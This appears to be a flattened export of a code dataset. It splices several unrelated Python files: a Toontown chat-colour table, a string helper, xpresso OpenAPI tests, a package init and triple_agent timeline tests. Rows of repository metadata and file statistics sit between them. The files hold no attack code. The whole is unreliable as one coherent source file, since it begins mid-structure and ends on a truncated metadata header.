((0.3, 0.3, 0.7, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCNonPlayer: (
# Normal FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.8, 0.4, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSuit: (
# Normal FG BG
((0.2, 0.2, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.2, 0.2, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.4, 0.4, 0.4, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.2, 0.2, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSuitBuilding: (
# Normal FG BG
((0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.5, 0.5, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.7, 0.7, 0.7, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCToonBuilding: (
# Normal FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCHouseBuilding: (
# Normal FG BG
((0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.2, 0.2, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
),
CCSpeedChat: (
# Normal FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
((0.0, 0.5, 0.0, 1.0), (0.5, 0.5, 0.5, 0.6), # Name
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Hover FG BG
((0.0, 0.7, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7), # Name
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Disable FG BG
((0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
)
}
ARROW_COLORS = {
CCSuit: (0.8, 0.4, 0.0, 1.0),
}
DEFAULT_WORDWRAPS = {
CCNormal: 7.5,
CCNonPlayer: 7.5,
CCSuit: 7.5,
CCToonBuilding: 8.5,
CCSuitBuilding: 8.5,
CCHouseBuilding: 10.0,
CCSpeedChat: 7.5
}
WTNormal = 0
WTQuickTalker = 1
WTSystem = 2
WTBattleSOS = 3
WTEmote = 4
WTToontownBoardingGroup = 5
WHISPER_COLORS = {
WTNormal: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))
),
WTQuickTalker: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.6, 0.8, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.9, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.2, 0.7, 0.8, 0.6))
),
WTSystem: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 1.0, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))
),
WTBattleSOS: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.4, 0.0, 0.8)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.8, 0.3, 0.6, 0.6))
),
WTEmote: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))
),
WTToontownBoardingGroup: (
# Normal FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.5, 0.1, 0.6)),
# Click FG BG
((1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 0.8)),
# Hover FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.2, 0.6)),
# Disable FG BG
((0.0, 0.0, 0.0, 1.0), (0.9, 0.6, 0.1, 0.6))
)
}
def getFriendColor(handle):
return CCNormal if base.localAvatar.isTrueFriends(handle.doId) else CCSpeedChat
| 39.146341
| 83
| 0.335826
| 1,600
| 8,025
| 1.681875
| 0.03875
| 0.200669
| 0.217391
| 0.221479
| 0.736901
| 0.735414
| 0.726496
| 0.726496
| 0.723523
| 0.723523
| 0
| 0.288062
| 0.423801
| 8,025
| 205
| 83
| 39.146341
| 0.293901
| 0.248598
| 0
| 0.554795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0
| 0.006849
| 0.013699
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
3847175c1831e351c1e176a360a63bb3b77691ab
| 101
|
py
|
Python
|
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | 1
|
2015-06-25T22:09:49.000Z
|
2015-06-25T22:09:49.000Z
|
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | null | null | null |
brain/utils.py
|
NuChwezi/nubrain
|
0b7fc9ed269a008c406ac36f49aa5ec44fca619a
|
[
"MIT"
] | null | null | null |
def text_snippet_start(s, max_len=10):
return s[:max_len] + ('...' if len(s) > max_len else '')
| 25.25
| 60
| 0.613861
| 18
| 101
| 3.166667
| 0.611111
| 0.210526
| 0.368421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.178218
| 101
| 3
| 61
| 33.666667
| 0.662651
| 0
| 0
| 0
| 0
| 0
| 0.03
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
69af9cbe1a0924e12f9699b8936cf401ce8aba2e
| 13,111
|
py
|
Python
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 75
|
2022-01-18T02:17:57.000Z
|
2022-03-24T02:30:04.000Z
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 73
|
2022-01-18T03:01:27.000Z
|
2022-03-27T16:41:38.000Z
|
tests/test_openapi/model_name_conflict_resolution/test_model_name_conflcit_resolution.py
|
adriangb/xpresso
|
43fcc360f7b19c00e0b78480f96390bcb4d28053
|
[
"MIT"
] | 3
|
2022-01-18T22:47:06.000Z
|
2022-01-25T02:03:53.000Z
|
from dataclasses import dataclass
from typing import Any, Dict
from tests.test_openapi.model_name_conflict_resolution.user1 import User as User1
from tests.test_openapi.model_name_conflict_resolution.user2 import User as User2
from xpresso import (
App,
FromFormField,
FromHeader,
FromJson,
FromMultipart,
FromQuery,
Path,
)
from xpresso.testclient import TestClient
def test_duplicate_model_name_in_parameters() -> None:
async def endpoint(q1: FromQuery[User1], q2: FromHeader[User2]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"name": "q1",
"in": "query",
},
{
"required": True,
"style": "simple",
"explode": False,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
},
"name": "q2",
"in": "header",
},
],
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
def test_duplicate_model_name_in_form_data() -> None:
@dataclass
class FormData:
field1: FromFormField[User1]
field2: FromFormField[User2]
async def endpoint(form: FromMultipart[FormData]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"requestBody": {
"content": {
"multipart/form-data": {
"schema": {
"required": ["field1", "field2"],
"type": "object",
"properties": {
"field1": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"field2": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
},
},
},
"encoding": {
"field1": {"style": "form", "explode": True},
"field2": {"style": "form", "explode": True},
},
}
},
"required": True,
},
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
def test_model_shared_between_params_and_body() -> None:
async def endpoint(q: FromQuery[User1], b: FromJson[User2]) -> None:
...
app = App([Path("/", get=endpoint)])
expected_openapi_json: Dict[str, Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {
"description": "OK",
"content": {"application/json": {}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user1__User"
},
"name": "q",
"in": "query",
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/tests__test_openapi__model_name_conflict_resolution__user2__User"
}
}
},
"required": True,
},
}
}
},
"components": {
"schemas": {
"tests__test_openapi__model_name_conflict_resolution__user1__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "integer"}},
},
"tests__test_openapi__model_name_conflict_resolution__user2__User": {
"title": "User",
"required": ["foo"],
"type": "object",
"properties": {"foo": {"title": "Foo", "type": "string"}},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
client = TestClient(app)
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi_json
| 38.905045
| 139
| 0.331477
| 721
| 13,111
| 5.772538
| 0.147018
| 0.034599
| 0.05382
| 0.070639
| 0.834935
| 0.834935
| 0.823642
| 0.818357
| 0.793369
| 0.793369
| 0
| 0.013103
| 0.540157
| 13,111
| 336
| 140
| 39.020833
| 0.677227
| 0
| 0
| 0.617089
| 0
| 0
| 0.249638
| 0.085577
| 0
| 0
| 0
| 0
| 0.018987
| 1
| 0.009494
| false
| 0
| 0.018987
| 0
| 0.037975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69df7c42a566b7483ba22ada5ccb396dd4fcf747
| 77
|
py
|
Python
|
src/stk/serialization/json/deserializers/__init__.py
|
andrewtarzia/stk
|
1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/serialization/json/deserializers/__init__.py
|
JelfsMaterialsGroup/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/serialization/json/deserializers/__init__.py
|
supramolecular-toolkit/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
from .molecule import * # noqa
from . constructed_molecule import * # noqa
| 25.666667
| 44
| 0.727273
| 9
| 77
| 6.111111
| 0.555556
| 0.509091
| 0.654545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194805
| 77
| 2
| 45
| 38.5
| 0.887097
| 0.116883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2a5535da3c1a5f74644e14fc299e9e3dffcd7fef
| 8,054
|
py
|
Python
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 3
|
2020-04-25T11:42:03.000Z
|
2020-07-08T16:38:26.000Z
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | 17
|
2019-08-11T19:09:55.000Z
|
2021-03-30T17:12:28.000Z
|
triple_agent/tests/test_timeline_coherent.py
|
andrewzwicky/TripleAgent
|
8d056df5c53a3d264dc778bad6771a0a2f62e7e7
|
[
"MIT"
] | null | null | null |
import pytest
from triple_agent.classes.missions import Missions
from triple_agent.classes.books import Books
from triple_agent.classes.timeline import TimelineCoherency, Timeline
SPY_CAST_INDEX = 0
AMBA_CAST_INDEX = 1
CIVILIAN_CAST_INDEX = 9
SWAP_SELECTED_INDEX = 18
INSPECT_ENABLED_INDEX = 27
GAME_START_INDEX = 31
FINGERPRINT_COMPLETE_INDEX = 77
GAME_END_INDEX = 101
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_correct(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
# check that the game is coherent to begin with.
assert game.is_timeline_coherent() == TimelineCoherency.Coherent
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_timeline(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = None
assert game.is_timeline_coherent() == TimelineCoherency.NoTimeline
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_role(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[6].role = (None,)
assert game.is_timeline_coherent() == TimelineCoherency.CharacterNotAssignedRole
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_cast_name(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[6].cast_name = (None,)
assert game.is_timeline_coherent() == TimelineCoherency.RoleWithNoCharacter
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_start(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != GAME_START_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.NoGameStart
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_end(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != GAME_END_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.NoGameEnding
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_game_start_or_end(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t
for i, t in enumerate(game.timeline)
if i not in [GAME_START_INDEX, GAME_END_INDEX]
]
assert (
game.is_timeline_coherent()
== TimelineCoherency.NoGameStart | TimelineCoherency.NoGameEnding
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count_and_spy(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != SPY_CAST_INDEX]
assert (
game.is_timeline_coherent()
== TimelineCoherency.SpyNotCastInBeginning
| TimelineCoherency.GuestCountMismatch
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != CIVILIAN_CAST_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.GuestCountMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_start_clock(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[0].time = 200
assert (
game.is_timeline_coherent()
== TimelineCoherency.StartClockMismatch | TimelineCoherency.TimeRewind
)
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_start_clock_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.start_clock_seconds = 200
assert game.is_timeline_coherent() == TimelineCoherency.StartClockMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_guest_count_amba(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != AMBA_CAST_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.GuestCountMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_missing_book(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[48].books = (None, Books.Green)
assert game.is_timeline_coherent() == TimelineCoherency.BookMissingColor
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_rewind(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = Timeline(game.timeline.lines + game.timeline.lines[-10:])
assert game.is_timeline_coherent() == TimelineCoherency.TimeRewind
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_complete_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.completed_missions = game.completed_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.CompletedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_selected_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.selected_missions = game.selected_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.SelectedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_picked_mismatch(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.picked_missions = game.picked_missions & ~Missions.Fingerprint
assert game.is_timeline_coherent() == TimelineCoherency.PickedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_complete_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t for i, t in enumerate(game.timeline) if i != FINGERPRINT_COMPLETE_INDEX
]
assert game.is_timeline_coherent() == TimelineCoherency.CompletedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_selected_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [t for i, t in enumerate(game.timeline) if i != SWAP_SELECTED_INDEX]
assert game.is_timeline_coherent() == TimelineCoherency.SelectedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_picked_mismatch_2(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline = [
t for i, t in enumerate(game.timeline) if i != INSPECT_ENABLED_INDEX
]
assert game.is_timeline_coherent() == TimelineCoherency.PickedMissionsMismatch
@pytest.mark.parsing
@pytest.mark.quick
def test_timeline_coherent_no_elapsed(get_preparsed_timeline_games):
game = get_preparsed_timeline_games[0]
assert game.uuid == "07WVnz3aR3i6445zgSCZjA"
game.timeline[10].elapsed_time = None
assert game.is_timeline_coherent() == TimelineCoherency.ElapsedTimeMissing
| 33.280992
| 88
| 0.785572
| 986
| 8,054
| 6.100406
| 0.099391
| 0.069825
| 0.139651
| 0.174564
| 0.868495
| 0.868495
| 0.848878
| 0.813799
| 0.770906
| 0.741978
| 0
| 0.031714
| 0.130867
| 8,054
| 241
| 89
| 33.419087
| 0.827571
| 0.005711
| 0
| 0.573864
| 0
| 0
| 0.057707
| 0.057707
| 0
| 0
| 0
| 0
| 0.238636
| 1
| 0.119318
| false
| 0
| 0.022727
| 0
| 0.142045
| 0.017045
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a587ceea7996e96a61097f62af34c8de073e873
| 38,987
|
py
|
Python
|
_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
_serverApp/_logProcessServices.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | 1
|
2021-06-02T00:36:03.000Z
|
2021-06-02T00:36:03.000Z
|
